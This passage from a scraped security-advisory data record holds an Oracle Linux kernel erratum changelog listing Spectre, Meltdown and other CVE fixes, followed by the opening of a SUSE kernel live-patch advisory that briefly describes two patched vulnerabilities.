x86/spectre_v2: Figure out if STUFF_RSB macro needs to be used. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre_v2: Figure out when to use IBRS. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Add IBRS option. (Konrad Rzeszutek Wilk) [Orabug: 27477743] {CVE-2017-5715}\n- x86/spectre: Add boot time option to select Spectre v2 mitigation (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/retpoline: Add initial retpoline support (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- kconfig.h: use __is_defined() to check if MODULE is defined (Masahiro Yamada) [Orabug: 27477743] {CVE-2017-5715}\n- EXPORT_SYMBOL() for asm (Al Viro) [Orabug: 27477743] {CVE-2017-5715}\n- x86/asm: Make asm/alternative.h safe from assembly (Andy Lutomirski) [Orabug: 27477743] {CVE-2017-5715}\n- x86/kbuild: enable modversions for symbols exported from asm (Adam Borowski) [Orabug: 27477743] {CVE-2017-5715}\n- x86/asm: Use register variable to get stack pointer value (Andrey Ryabinin) [Orabug: 27477743] {CVE-2017-5715}\n- x86/mm/32: Move setup_clear_cpu_cap(X86_FEATURE_PCID) earlier (Andy Lutomirski) [Orabug: 27477743] {CVE-2017-5715}\n- x86/alternatives: Add missing '\n' at end of ALTERNATIVE inline asm (David Woodhouse) [Orabug: 27477743] {CVE-2017-5715}\n- x86/alternatives: Fix optimize_nops() checking (Borislav Petkov) [Orabug: 27477743] {CVE-2017-5715}\n- block: Check for gaps on front and back merges (Jens Axboe) [Orabug: 27484719] \n- block: Copy a user iovec if it includes gaps (Sagi Grimberg) [Orabug: 27484719] \n- block: Replace SG_GAPS with new queue limits mask (Keith Busch) [Orabug: 27484719] \n- Revert 'block: Copy a user iovec if it includes gaps' (Ashok Vairavan) [Orabug: 27484719] \n- Revert 'block: Check for gaps on front and back merges' (Ashok Vairavan) [Orabug: 27484719] \n- Revert 'blk: [Partial] Replace SG_GAPGS with new queue limits mask' (Ashok Vairavan) [Orabug: 27484719] \n- qlcnic: fix deadlock bug (Junxiao Bi) [Orabug: 27496907] \n- x86/entry: RESTORE_IBRS needs to be done under kernel CR3 (Ankur Arora) [Orabug: 27501734]\n[4.1.12-124.3.1]\n- rds: Fix NULL pointer dereference in __rds_rdma_map (Hakon Bugge) [Orabug: 27477010] \n- Btrfs: fix unexpected EEXIST from btrfs_get_extent (Liu Bo) [Orabug: 27446668] \n- Btrfs: fix incorrect block_len in merge_extent_mapping (Liu Bo) [Orabug: 27446668] \n- Btrfs: add WARN_ONCE to detect unexpected error from merge_extent_mapping (Liu Bo) [Orabug: 27446668] \n- Btrfs: deal with existing encompassing extent map in btrfs_get_extent() (Omar Sandoval) [Orabug: 27446668] \n- Btrfs: deal with duplciates during extent_map insertion in btrfs_get_extent (Chris Mason) [Orabug: 27446668] \n- x86/spec: Fix spectre_v1 bug and mitigation indicators (John Haxby) [Orabug: 27470687] \n- Drivers: hv: util: Backup: Fix a rescind processing issue (K. Y. Srinivasan) [Orabug: 27426063] \n- Drivers: hv: vss: Operation timeouts should match host expectation (Alex Ng) [Orabug: 27426063] \n- Drivers: hv: vss: Improve log messages. (Alex Ng) [Orabug: 27426063] \n- Drivers: hv: utils: Check VSS daemon is listening before a hot backup (Alex Ng) [Orabug: 27426063] \n- Drivers: hv: utils: Continue to poll VSS channel after handling requests. (Alex Ng) [Orabug: 27426063] \n- Drivers: hv: utils: fix a race on userspace daemons registration (Vitaly Kuznetsov) [Orabug: 27426063] \n- Drivers: hv: util: catch allocation errors (Olaf Hering) [Orabug: 27426063] \n- Drivers: hv: vss: run only on supported host versions (Olaf Hering) [Orabug: 27426063] \n- Drivers: hv: utils: unify driver registration reporting (Vitaly Kuznetsov) [Orabug: 27426063] \n- drivers/char/mem.c: deny access in open operation when securelevel is set (Ethan Zhao) [Orabug: 26943864] [Orabug: 27465736] \n- rds: Calling getsockname() on unbounded socket generates seg fault (Ka-Cheong Poon) [Orabug: 27463484] \n- rds: Second bind() can overwrite the first bind() (Ka-Cheong Poon) [Orabug: 27463500] \n- rds: Un-connected socket sendmsg() with a NULL destination does not fail (Ka-Cheong Poon) [Orabug: 27463507] \n- x86/mitigation/spectre_v2: Add reporting of 'lfence' (Konrad Rzeszutek Wilk) \n- x86/spec: Add 'lfence_enabled' in sysfs (Konrad Rzeszutek Wilk) \n- x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation (Konrad Rzeszutek Wilk) \n- x86: Fix compile issues if CONFIG_XEN not defined (Konrad Rzeszutek Wilk) \n- hugetlb: fix nr_pmds accounting with shared page tables (Kirill A. Shutemov) [Orabug: 27451809] \n- net/mlx4_core: allow QPs with enable_smi_admin enabled (Zhu Yanjun) [Orabug: 27452072] \n- net/rds: Fix incorrect error handling (Hakon Bugge) [Orabug: 27469760]\n[4.1.12-124.2.1]\n- x86: Move STUFF_RSB in to the idt macro (Konrad Rzeszutek Wilk) \n- x86/spectre: Drop the warning about ibrs being obsolete. (Konrad Rzeszutek Wilk) \n- x86/spec: STUFF_RSB _before_ ENABLE_IBRS (Konrad Rzeszutek Wilk) \n- x86/spec: Dont print the Missing arguments for option spectre_v2. (Konrad Rzeszutek Wilk) \n- x86: Move ENABLE_IBRS in the interrupt macro. (Konrad Rzeszutek Wilk) \n- x86/IBRS: Dont try to change IBRS mode if IBRS is not available (Boris Ostrovsky) [Orabug: 27448280] \n- x86/IBRS: Remove support for IBRS_ENABLED_USER mode (Boris Ostrovsky) [Orabug: 27448280] \n- x86: Use PRED_CMD MSR when ibpb is enabled (Konrad Rzeszutek Wilk) \n- x86/IBRS: Drop unnecessary WRITE_ONCE (Boris Ostrovsky) [Orabug: 27448280] \n- x86/IBRS/IBPB: Remove procfs interface to ibrs/ibpb_enable (Boris Ostrovsky) [Orabug: 27448280] \n- x86/IBPB: Provide debugfs interface for changing IBPB mode (Boris Ostrovsky) [Orabug: 27448313] \n- x86/spec: Also print IBRS if IBPB is disabled. (Konrad Rzeszutek Wilk) \n- x86: Include linux/device.h in bugs_64.c (Boris Ostrovsky) [Orabug: 27448330] \n- fs/ocfs2: remove page cache for converted direct write (Wengang Wang) \n- Revert 'ocfs2: code clean up for direct io' (Wengang Wang) \n- mlx4: add mstflint secure boot access kernel support (Qing Huang) [Orabug: 27424392] \n- x86/microcode/intel: Extend BDW late-loading with a revision check (Jia Zhang) [Orabug: 27343609] \n- x86/microcode/intel: Disable late loading on model 79 (Borislav Petkov) [Orabug: 27343609] \n- autofs: use dentry flags to block walks during expire (Ian Kent) [Orabug: 26032471] \n- autofs races (Al Viro) [Orabug: 26032471] \n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n[4.1.12-124.1.1]\n- dtrace: revive dtrace_gethrtime() (Tomas Jedlicka) [Orabug: 27409933]\n[4.1.12-124]\n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27353383] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27353383] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27353383] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27353383] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27353383] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27353383] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27353383] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27353383] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27206805] {CVE-2017-1000407} {CVE-2017-1000407}\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) [Orabug: 27397028] \n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 26670475] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 26670475] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 26670475] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 26670475] \n- x86/fpu: Dont let userspace set bogus xcomp_bv (Tim Tianyang Chen) [Orabug: 27050688] {CVE-2017-15537}\n- sctp: do not peel off an assoc from one netns to another one (Xin Long) [Orabug: 27386997] {CVE-2017-15115}\n- media: dib0700: fix invalid dvb_detach argument (Andrey Konovalov) [Orabug: 27215141] {CVE-2017-16646}\n- Sanitize 'move_pages()' permission checks (Linus Torvalds) [Orabug: 27364683] {CVE-2017-14140}\n- assoc_array: Fix a buggy node-splitting case (David Howells) [Orabug: 27364588] {CVE-2017-12193} {CVE-2017-12193}\n- net: ipv4: fix for a race condition in raw_sendmsg (Mohamed Ghannam) [Orabug: 27390679] {CVE-2017-17712}\n[4.1.12-123]\n- x86/pti/efi: broken conversion from efi to kernel page table (Pavel Tatashin) [Orabug: 27378516] [Orabug: 27333760] {CVE-2017-5754}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT (redux) (Konrad Rzeszutek Wilk) [Orabug: 27378451] \n- x86/IBRS: Make sure we restore MSR_IA32_SPEC_CTRL to a valid value (Boris Ostrovsky) [Orabug: 27378102] \n- x86/IBRS/IBPB: Set sysctl_ibrs/ibpb_enabled properly (Boris Ostrovsky) [Orabug: 27382723] \n- x86/spec_ctrl: Add missing 'lfence' when IBRS is not supported. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/entry_64: TRACE_IRQS_OFF before re-enabling. (Jamie Iles) [Orabug: 27344012] {CVE-2017-5715}\n- ptrace: remove unlocked RCU dereference. (Jamie Iles) [Orabug: 27344012] {CVE-2017-5715}\n- x86/ia32: Adds code hygiene for 32bit SYSCALL instruction entry. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/ia32: dont save registers on audit call (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec/ia32: Sprinkle IBRS and RSB at the 32-bit SYSCALL (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/ia32: Move STUFF_RSB And ENABLE_IBRS (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT. (Konrad Rzeszutek Wilk) [Orabug: 27365575] {CVE-2017-5715}\n- x86/ia32: save and clear registers on syscall. (Jamie Iles) [Orabug: 27365431] {CVE-2017-5754}\n- x86/IBRS: Save current status of MSR_IA32_SPEC_CTRL (Boris Ostrovsky) [Orabug: 27365419] \n- pti: Rename X86_FEATURE_KAISER to X86_FEATURE_PTI (Pavel Tatashin) [Orabug: 27333760] {CVE-2017-5754}\n- x86/spec_ctrl: Add missing IBRS_DISABLE (Konrad Rzeszutek Wilk) [Orabug: 27365403] \n- Make use of ibrs_inuse consistent. (Jun Nakajima) [Orabug: 27365390] \n- x86/kvm: Set IBRS on VMEXIT if guest disabled it. (Konrad Rzeszutek Wilk) [Orabug: 27364900] \n- Re-introduce clearing of r12-15, rbp, rbx (Kris Van Hees) [Orabug: 27344012] {CVE-2017-5715}\n- x86: more ibrs/pti fixes (Pavel Tatashin) [Orabug: 27333760] {CVE-2017-5754}\n- x86/spec: Actually do the check for in_use on ENABLE_IBRS (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- kvm: svm: Expose the CPUID.0x80000008 ebx flag. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec_ctrl: Provide the sysfs version of the ibrs_enabled (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Use better #define for FEATURE_ENABLE_IBRS and 0 (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Instead of 0x2, 0x4, and 0x1 use #defines. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- kpti: Disable when running under Xen PV (Konrad Rzeszutek Wilk) [Orabug: 27333760] {CVE-2017-5754}\n- x86: Dont ENABLE_IBRS in nmi when we are still running on user cr3 (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts - fix ia32 path (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Fix spectre/kpti integration (Konrad Rzeszutek Wilk) [Orabug: 27333760] {CVE-2017-5754}\n- PTI: unbreak EFI old_memmap (Jiri Kosina) [Orabug: 27333760] {CVE-2017-5754}\n- KAISER KABI tweaks. (Martin K. Petersen) [Orabug: 27333760] {CVE-2017-5754}\n- x86/ldt: fix crash in ldt freeing. (Jamie Iles) [Orabug: 27333760] {CVE-2017-5754}\n- x86/entry: Define 'cpu_current_top_of_stack' for 64-bit code (Denys Vlasenko) [Orabug: 27333760] {CVE-2017-5754}\n- x86/entry: Remove unused 'kernel_stack' per-cpu variable (Denys Vlasenko) [Orabug: 27333760] {CVE-2017-5754}\n- x86/entry: Stop using PER_CPU_VAR(kernel_stack) (Denys Vlasenko) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: Set _PAGE_NX only if supported (Guenter Roeck) [Orabug: 27333760] {CVE-2017-5754}\n- x86/vdso: Get pvclock data from the vvar VMA instead of the fixmap (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- KPTI: Report when enabled (Kees Cook) [Orabug: 27333760] {CVE-2017-5754}\n- KPTI: Rename to PAGE_TABLE_ISOLATION (Kees Cook) [Orabug: 27333760] {CVE-2017-5754}\n- x86/kaiser: Move feature detection up (Borislav Petkov) [Orabug: 27333760] {CVE-2017-5754}\n- x86/kaiser: Reenable PARAVIRT (Borislav Petkov) [Orabug: 27333760] {CVE-2017-5754}\n- x86/paravirt: Dont patch flush_tlb_single (Thomas Gleixner) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: kaiser_flush_tlb_on_return_to_user() check PCID (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: asm/tlbflush.h handle noPGE at lower level (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: drop is_atomic arg to kaiser_pagetable_walk() (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: use ALTERNATIVE instead of x86_cr3_pcid_noflush (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- x86/kaiser: Check boottime cmdline params (Borislav Petkov) [Orabug: 27333760] {CVE-2017-5754}\n- x86/kaiser: Rename and simplify X86_FEATURE_KAISER handling (Borislav Petkov) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: add 'nokaiser' boot option, using ALTERNATIVE (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: fix unlikely error in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: _pgd_alloc() without __GFP_REPEAT to avoid stalls (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: paranoid_entry pass cr3 need to paranoid_exit (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: x86_cr3_pcid_noflush and x86_cr3_pcid_user (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: PCID 0 for kernel and 128 for user (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: load_new_mm_cr3() let SWITCH_USER_CR3 flush user (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: enhanced by kernel and user PCIDs (Dave Hansen) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: vmstat show NR_KAISERTABLE as nr_overhead (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: delete KAISER_REAL_SWITCH option (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: name that 0x1000 KAISER_SHADOW_PGD_OFFSET (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: cleanups while trying for gold link (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: kaiser_remove_mapping() move along the pgd (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: tidied up kaiser_add/remove_mapping slightly (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: tidied up asm/kaiser.h somewhat (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: ENOMEM if kaiser_pagetable_walk() NULL (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: fix perf crashes (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: fix regs to do_nmi() ifndef CONFIG_KAISER (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: KAISER depends on SMP (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: fix build and FIXME in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: stack map PAGE_SIZE at THREAD_SIZE-PAGE_SIZE (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: do not set _PAGE_NX on pgd_none (Hugh Dickins) [Orabug: 27333760] {CVE-2017-5754}\n- kaiser: merged update (Dave Hansen) [Orabug: 27333760] {CVE-2017-5754}\n- KAISER: Kernel Address Isolation (Richard Fellner) [Orabug: 27333760] {CVE-2017-5754}\n- x86/boot: Add early cmdline parsing for options with arguments (Tom Lendacky) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm/64: Fix reboot interaction with CR4.PCIDE (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Enable CR4.PCIDE on supported systems (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Add the 'nopcid' boot option to turn off PCID (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Disable PCID on 32-bit kernels (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Remove the UP asm/tlbflush.h code, always use the (formerly) SMP code (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Reimplement flush_tlb_page() using flush_tlb_mm_range() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Make flush_tlb_mm_range() more predictable (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Remove flush_tlb() and flush_tlb_current_task() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/vm86/32: Switch to flush_tlb_mm_range() in mark_screen_rdonly() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/irq: Do not substract irq_tlb_count from irq_call_count (Aaron Lu) [Orabug: 27333760] {CVE-2017-5754}\n- sched/core: Idle_task_exit() shouldnt use switch_mm_irqs_off() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- ARM: Hide finish_arch_post_lock_switch() from modules (Steven Rostedt) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm, sched/core: Turn off IRQs in switch_mm() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm, sched/core: Uninline switch_mm() (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Build arch/x86/mm/tlb.c even on !SMP (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- sched/core: Add switch_mm_irqs_off() and use it in the scheduler (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- mm/mmu_context, sched/core: Fix mmu_context.h assumption (Ingo Molnar) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: If INVPCID is available, use it to flush global mappings (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Add a 'noinvpcid' boot option to turn off INVPCID (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Fix INVPCID asm constraint (Borislav Petkov) [Orabug: 27333760] {CVE-2017-5754}\n- x86/mm: Add INVPCID helpers (Andy Lutomirski) [Orabug: 27333760] {CVE-2017-5754}\n- x86/ibrs: Remove 'ibrs_dump' and remove the pr_debug (Konrad Rzeszutek Wilk) [Orabug: 27351274] \n- kABI: Revert kABI: Make the boot_cpu_data look normal (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- userns: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- udf: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- net: mpls: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- fs: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- ipv6: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- ipv4: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- Thermal/int340x: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- cw1200: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- qla2xxx: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- p54: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- carl9170: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- uvcvideo: prevent speculative execution (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- bpf: prevent speculative execution in eBPF interpreter (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- locking/barriers: introduce new observable speculation barrier (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- x86/cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- x86/cpu/AMD: Make the LFENCE instruction serialized (Elena Reshetova) [Orabug: 27340445] {CVE-2017-5753}\n- kABI: Make the boot_cpu_data look normal. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- kernel.spec: Require the new microcode_ctl. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715} {CVE-2017-5715}\n- x86/microcode/AMD: Add support for fam17h microcode loading (Tom Lendacky) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec_ctrl: Disable if running as Xen PV guest. (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- Set IBPB when running a different VCPU (Dave Hansen) [Orabug: 27344012] {CVE-2017-5715}\n- Clear the host registers after setbe (Jun Nakajima) [Orabug: 27344012] {CVE-2017-5715}\n- Use the ibpb_inuse variable. (Jun Nakajima) [Orabug: 27344012] {CVE-2017-5715}\n- KVM: x86: add SPEC_CTRL to MSR and CPUID lists (Andrea Arcangeli) [Orabug: 27344012] {CVE-2017-5715}\n- kvm: vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Paolo Bonzini) [Orabug: 27344012] {CVE-2017-5715}\n- Use the 'ibrs_inuse' variable. (Jun Nakajima) [Orabug: 27344012] {CVE-2017-5715}\n- kvm: svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Andrea Arcangeli) [Orabug: 27344012] {CVE-2017-5715}\n- x86/svm: Set IBPB when running a different VCPU (Paolo Bonzini) [Orabug: 27344012] {CVE-2017-5715}\n- x86/kvm: Pad RSB on VM transition (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/cpu/AMD: Add speculative control support for AMD (Tom Lendacky) [Orabug: 27344012] {CVE-2017-5715}\n- x86/microcode: Recheck IBRS and IBPB feature on microcode reload (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Move IBRS/IBPB feature detection to scattered.c (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec_ctrl: Add lock to serialize changes to ibrs and ibpb control (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/kvm: clear registers on VM exit (Tom Lendacky) [Orabug: 27344012] {CVE-2017-5715}\n- x86/kvm: Set IBPB when switching VM (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- *INCOMPLETE* x86/syscall: Clear unused extra registers on syscall entrance (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/entry: Stuff RSB for entry to kernel for non-SMEP platform (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/mm: Only set IBPB when the new thread cannot ptrace current thread (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/mm: Set IBPB upon context switch (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/idle: Disable IBRS when offlining cpu and re-enable on wakeup (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/idle: Disable IBRS entering idle and enable it on wakeup (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/spec_ctrl: save IBRS MSR value in paranoid_entry (Andrea Arcangeli) [Orabug: 27344012] {CVE-2017-5715}\n- *Scaffolding* x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Add macro that does not save rax, rcx, rdx on stack to disable IBRS (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/enter: MACROS to set/clear IBRS and set IBP (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86/feature: Report presence of IBPB and IBRS control (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- x86: Add STIBP feature enumeration (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/cpufeature: Add X86_FEATURE_IA32_ARCH_CAPS and X86_FEATURE_IBRS_ATT (Konrad Rzeszutek Wilk) [Orabug: 27344012] {CVE-2017-5715}\n- x86/feature: Enable the x86 feature to control (Tim Chen) [Orabug: 27344012] {CVE-2017-5715}\n- dccp: CVE-2017-8824: use-after-free in DCCP code (Mohamed Ghannam) [Orabug: 27290292] {CVE-2017-8824}\n- negotiate_mq should happen in all cases of a new VBD being discovered by xen-blkfront, whether called through _probe() or a hot-attached new VBD from dom-0 via xenstore. Otherwise, hot-attached new VBDs are left configured without multi-queue. (Patrick Colp) [Orabug: 27180421] \n- e1000: avoid null pointer dereference on invalid stat type (Colin Ian King) [Orabug: 27069012] \n- e1000: fix race condition between e1000_down() and e1000_watchdog (Vincenzo Maffione) [Orabug: 27069012] \n- e1000e: Be drop monitor friendly (Florian Fainelli) [Orabug: 27069012] \n- e1000e: apply burst mode settings only on default (Willem de Bruijn) [Orabug: 27069012] \n- e1000e: fix buffer overrun while the I219 is processing DMA transactions (Sasha Neftin) [Orabug: 27069012] \n- e1000e: Avoid receiver overrun interrupt bursts (Benjamin Poirier) [Orabug: 27069012] \n- e1000e: Separate signaling for link check/link up (Benjamin Poirier) [Orabug: 27069012] \n- e1000e: Fix return value test (Benjamin Poirier) [Orabug: 27069012] \n- e1000e: Fix wrong comment related to link detection (Benjamin Poirier) [Orabug: 27069012] \n- e1000e: Fix error path in link detection (Benjamin Poirier) [Orabug: 27069012] \n- drivers: net: e1000e: use setup_timer() helper. (Allen Pais) [Orabug: 27069012] \n- e1000e: Initial Support for IceLake (Sasha Neftin) [Orabug: 27069012] \n- e1000e: add check on e1e_wphy() return value (Gustavo A R Silva) [Orabug: 27069012] \n- e1000e: Undo e1000e_pm_freeze if __e1000_shutdown fails (Chris Wilson) [Orabug: 27069012]", "modified": "2018-04-18T00:00:00", "published": "2018-04-18T00:00:00", "id": "ELSA-2018-4071", "href": "http://linux.oracle.com/errata/ELSA-2018-4071.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.74-92_35 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "modified": "2017-12-14T15:16:46", "published": "2017-12-14T15:16:46", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00041.html", "id": "SUSE-SU-2017:3295-1", "title": "Security update for the Linux Kernel (Live Patch 12 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T23:35:23", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.82-6_6 